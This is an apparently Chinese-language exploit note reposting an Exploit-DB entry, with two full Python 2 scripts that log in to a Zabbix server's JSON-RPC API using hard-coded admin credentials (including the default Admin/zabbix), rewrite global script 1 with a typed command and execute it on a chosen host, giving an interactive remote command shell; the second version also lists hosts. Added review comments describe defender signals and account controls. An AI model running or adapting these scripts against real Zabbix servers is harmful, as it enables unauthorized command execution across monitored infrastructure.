漏洞來源: https://www.exploit-db.com/exploits/39937/
成本:高
危害程度:低(此洞須要密碼)
利用條件: 須要高權限用戶登錄 API
影響範圍:2.2 - 3.0.3
tips:
python2.7
此洞須要你拿到高權限的帳戶密碼,當你拿到帳戶密碼以後,進入後臺也能夠執行命令,利用 API JSON-RPC 爲第二種方案。
此 exp 並非很完美,由於不會自動獲取 hostid。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A
#
# Review summary.  The script logs in to the Zabbix JSON-RPC API with a
# hard-coded account, then loops: it rewrites the command of the global
# script whose scriptid is "1" (script.update) and runs that script on a
# single, hard-coded host (script.execute), printing the returned value.
# Every request is an ordinary authenticated API call -- nothing bypasses
# authentication (hence "CVE : N/A" above), so the account used must already
# be allowed to edit and run global scripts (the surrounding notes call it a
# high-privilege account).  For defenders, the observable signals are
# script.update / script.execute calls arriving through api_jsonrpc.php and
# a changed command on scriptid 1; NOTE(review): confirm which of these the
# deployed version writes to its audit log.  The controls are on the account
# side: no default or shared admin credentials, API only over HTTPS, and
# script-edit/execute rights limited to the few roles that need them.
# Python 2 only (print statement, raw_input); there is no error handling
# anywhere, so any API error surfaces as a KeyError on the response dict.

import requests
import json
import readline  # never referenced; presumably a side-effect import so raw_input gets line editing -- verify

ZABIX_ROOT = 'http://192.168.66.2'  ### Zabbix IP-address -- plain http, so password and session token cross the wire unencrypted
url = ZABIX_ROOT + '/api_jsonrpc.php'  ### Don't edit

login = 'Admin'  ### Zabbix login (account) -- hard-coded in clear text
password = 'zabbix'  ### Zabbix password -- hard-coded in clear text
hostid = '10084'  ### Zabbix hostid: the host the command is run on; must be set by hand in this version

### auth
# user.login is the only unauthenticated call ("auth": None).  The ""+x+""
# wrapping around login/password is a no-op concatenation.
payload = {
    "jsonrpc" : "2.0",
    "method" : "user.login",
    "params": {
        'user': ""+login+"",
        'password': ""+password+"",
    },
    "auth" : None,
    "id" : 0,
}
headers = {
    'content-type': 'application/json',
}
auth = requests.post(url, data=json.dumps(payload), headers=(headers))
# auth['result'] is the session token reused by every later request.  A
# rejected login returns an "error" member and no "result" (JSON-RPC 2.0),
# so the subscripts below would raise KeyError rather than report it.
auth = auth.json()

while True:
    cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
    # An empty line prints this label but does NOT skip the rest of the
    # loop body: script.update and script.execute are still sent with an
    # empty command (what the server does with that is never checked).
    if cmd == "" :
        print "Result of last command:"
    if cmd == "quit" :
        break

    ### update
    # Overwrites the command of the existing global script with scriptid 1.
    # This is a persistent change to the Zabbix configuration, not a
    # transient one: it outlives the session and is what a review of the
    # configured global scripts would find.  The response (cmd_upd) is
    # never inspected.
    payload = {
        "jsonrpc": "2.0",
        "method": "script.update",
        "params": {
            "scriptid": "1",
            "command": ""+cmd+""
        },
        "auth" : auth['result'],
        "id" : 0,
    }
    cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))

    ### execute
    # Runs script 1 against hostid and prints result.value.  Where the
    # command actually executes (server vs. agent) is governed by the
    # script's own settings, which this code never touches -- TODO confirm.
    payload = {
        "jsonrpc": "2.0",
        "method": "script.execute",
        "params": {
            "scriptid": "1",
            "hostid": ""+hostid+""
        },
        "auth" : auth['result'],
        "id" : 0,
    }
    cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
    cmd_exe = cmd_exe.json()
    print cmd_exe["result"]["value"]
修改版本:自動獲取 hostid
#!/usr/bin/env python2.7
#coding=utf-8
# Review summary.  Variant of the script above with one difference: after
# logging in it calls host.get and prints every visible host's id and name,
# then asks the operator for a hostid instead of hard-coding one.  The rest
# is identical -- script.update rewrites the command of global script 1 and
# script.execute runs it on the chosen host.  Same security properties:
# ordinary authenticated API calls with a high-privilege account, plain-text
# credentials in the source, no HTTPS, no error handling (KeyError on any
# API error).  Defender signals: host.get followed by script.update /
# script.execute from one API session, and a modified command on scriptid 1;
# NOTE(review): confirm what the deployed version's audit log records.
import json
import requests

url = "http://x.x.x.x/api_jsonrpc.php"  # placeholder host, plain http
header = {"Content-Type": "application/json"}  # unused: the requests below use the separate `headers` dict
username = 'admin'  # hard-coded in clear text
password = 'admin888'  # hard-coded in clear text

#get auth id
# user.login is the only unauthenticated call ("auth": None); ""+x+"" is a no-op.
payload = {
    "jsonrpc" : "2.0",
    "method" : "user.login",
    "params": {
        'user': ""+username+"",
        'password': ""+password+"",
    },
    "auth" : None,
    "id" : 0,
}
headers = {
    'content-type': 'application/json',
}
auth = requests.post(url, data=json.dumps(payload), headers=(headers))
# auth['result'] is the session token; a rejected login carries "error" and
# no "result" (JSON-RPC 2.0), so the next subscript would raise KeyError.
auth = auth.json()

#get hostid
# Lists the hosts visible to this session, restricted to hostid and name.
# The filter on an empty host name looks like a no-op -- NOTE(review): verify
# against the server; the listing is what replaces the hand-set hostid of
# the original version.
data = {
    "jsonrpc":"2.0",
    "method":"host.get",
    "params":{
        "output":["hostid","name"],
        "filter":{"host":""}
    },
    "auth":""+auth['result']+"",
    "id":1,
}
hostid = requests.post(url, data=json.dumps(data), headers=(headers))
hostid = hostid.json()
print 'uid\tname'
for hid in hostid['result']:
    print hid['hostid'],hid['name']

#exec command
# `hostid` is rebound from the host.get response to the operator's input.
hostid = raw_input('\033[41m[input_hostid]>>: \033[0m ')
while True:
    cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
    # An empty line prints this label but does not skip the rest of the
    # loop body; the empty command is still sent to script.update.
    if cmd == "" :
        print "Result of last command:"
    if cmd == "quit" :
        break
    ### update
    # Persistently overwrites the command of global script 1; the response
    # (cmd_upd) is never inspected.
    payload = {
        "jsonrpc": "2.0",
        "method": "script.update",
        "params": {
            "scriptid": "1",
            "command": ""+cmd+""
        },
        "auth" : auth['result'],
        "id" : 0,
    }
    cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))
    ### execute
    # Runs script 1 on the chosen host and prints result.value.
    payload = {
        "jsonrpc": "2.0",
        "method": "script.execute",
        "params": {
            "scriptid": "1",
            "hostid": ""+hostid+""
        },
        "auth" : auth['result'],
        "id" : 0,
    }
    cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
    cmd_exe = cmd_exe.json()
    print cmd_exe["result"]["value"]
    # Dead code: the identical check at the top of the loop has already
    # broken out before this line can run.
    if cmd == 'quit':
        break